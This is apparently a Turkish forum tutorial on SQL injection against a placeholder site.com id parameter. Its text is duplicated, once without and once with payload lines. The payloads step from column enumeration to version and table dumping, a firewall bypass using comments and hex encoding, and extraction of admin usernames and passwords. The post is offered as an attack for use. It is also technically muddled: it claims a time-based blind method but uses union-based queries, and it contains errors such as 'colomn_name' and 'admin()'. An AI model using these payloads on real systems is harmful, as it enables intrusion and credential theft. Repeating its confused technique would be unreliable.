Time-Based Blind SQL İnjection ;
Merhaba arkadaşlar bu konumda Time-Based Blind SQL İnjection açığından bahsedeceğim.
Eğer hiç bir şekilde output verilmiyorsa, sleep, delay vb. fonksiyonu kullanılarak saldırı yapılabilir. Kabaca mantığından bahsedecek olursak;
eğer şu koşul doğru ise 1 saniye beklet, yanlış ise 2 saniye beklet şeklindedir.
Bu SQL Injection türü ile web uygulamasının bir süre uyutulup uyandırılması sonucu veritabanı okunabilir.
Şimdi başlayalım arkadaşlar.
"site.com/index.php?id=1 and SLEEP(5)=1#' komunutu sitemizde uygularsak göreceğiz ki arkadaşlar sayfa 5 saniye sonra açılacaktır. Bunun sebebi şudur SLEEP="5" verdik.
Şimdi devam ediyoruz arkadaşlar ;
"site.com/index.php?id=1 and SLEEP(1)=1 OR " komutunu uyguluyoruz ve SQL injection hatasını alıyoruz arkadaşlar.
yapıyoruz ve ekranımıza tablo numaralarını yansıtıyor. "2,4,5" Bizden 2 üzerinden devam edelim arkadaşlar.
yaptığımız taktirde arkadaşlar görüyoruz ki sitemizin versiyonunu gösteriyor.
Şimdi tabloları çekmeyi deniyelim arkadaşlar ;
komunutu uyguladığımız zaman
arkadaşlar ekranımıza tüm tablolar yansayacaktır. Peki Firewall devreye girerse ne olur arkadaşlar şöyle bir bypass deneriz. Örnek;
komutunda arkadaşlar
"table_name" işlemini HEX'leyerek yazmış bulunmaktayız. Bunlar örnek bir bypass arkadaşlar biz devam edelim artık.
komutunu uyguldağımız zaman arkadaşlar.
Admin tablosunun içeriğini ekranımıza yansıtacaktır. Gerisi artık zaten çok kolay arkadaşlar.
Komutunu uygulayarak admin tablosundaki username,password bilgilerine
ulaşmış oluruz arkadaşlar. Bu türdeki açık hakkındaki konumun sonuna geldim. Selametle kalın arkadaşlar..
Merhaba arkadaşlar bu konumda Time-Based Blind SQL İnjection açığından bahsedeceğim.
Eğer hiç bir şekilde output verilmiyorsa, sleep, delay vb. fonksiyonu kullanılarak saldırı yapılabilir. Kabaca mantığından bahsedecek olursak;
eğer şu koşul doğru ise 1 saniye beklet, yanlış ise 2 saniye beklet şeklindedir.
Bu SQL Injection türü ile web uygulamasının bir süre uyutulup uyandırılması sonucu veritabanı okunabilir.
Şimdi başlayalım arkadaşlar.
"site.com/index.php?id=1 and SLEEP(5)=1#' komunutu sitemizde uygularsak göreceğiz ki arkadaşlar sayfa 5 saniye sonra açılacaktır. Bunun sebebi şudur SLEEP="5" verdik.
Şimdi devam ediyoruz arkadaşlar ;
"site.com/index.php?id=1 and SLEEP(1)=1 OR " komutunu uyguluyoruz ve SQL injection hatasını alıyoruz arkadaşlar.
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1#'
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,2#'
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,2,3#'
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,2,3,4#'
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,2,3,4,5#'
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,2,3,4,5,6#'
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,version(),3,4,5,6#'Şimdi tabloları çekmeyi deniyelim arkadaşlar ;
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()#'arkadaşlar ekranımıza tüm tablolar yansayacaktır. Peki Firewall devreye girerse ne olur arkadaşlar şöyle bir bypass deneriz. Örnek;
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,group_concat(/*!table_name*/),3,4,5,6 from information_schema.tables where table_schema=database()#'
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,group_concat(0x7461626c655f6e616d65),3,4,5,6 from information_schema.tables where table_schema=database()#'"table_name" işlemini HEX'leyerek yazmış bulunmaktayız. Bunlar örnek bir bypass arkadaşlar biz devam edelim artık.
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,group_concat(colomn_name),3,4,5,6 from information_schema.columns where table_schema=admin()#'Admin tablosunun içeriğini ekranımıza yansıtacaktır. Gerisi artık zaten çok kolay arkadaşlar.
Kod:
"site.com/index.php?id=1 and SLEEP(1)=1 union select 1,group_concat(username,0x3a,password,0x3a),3,4,5,6 from admin()#'ulaşmış oluruz arkadaşlar. Bu türdeki açık hakkındaki konumun sonuna geldim. Selametle kalın arkadaşlar..
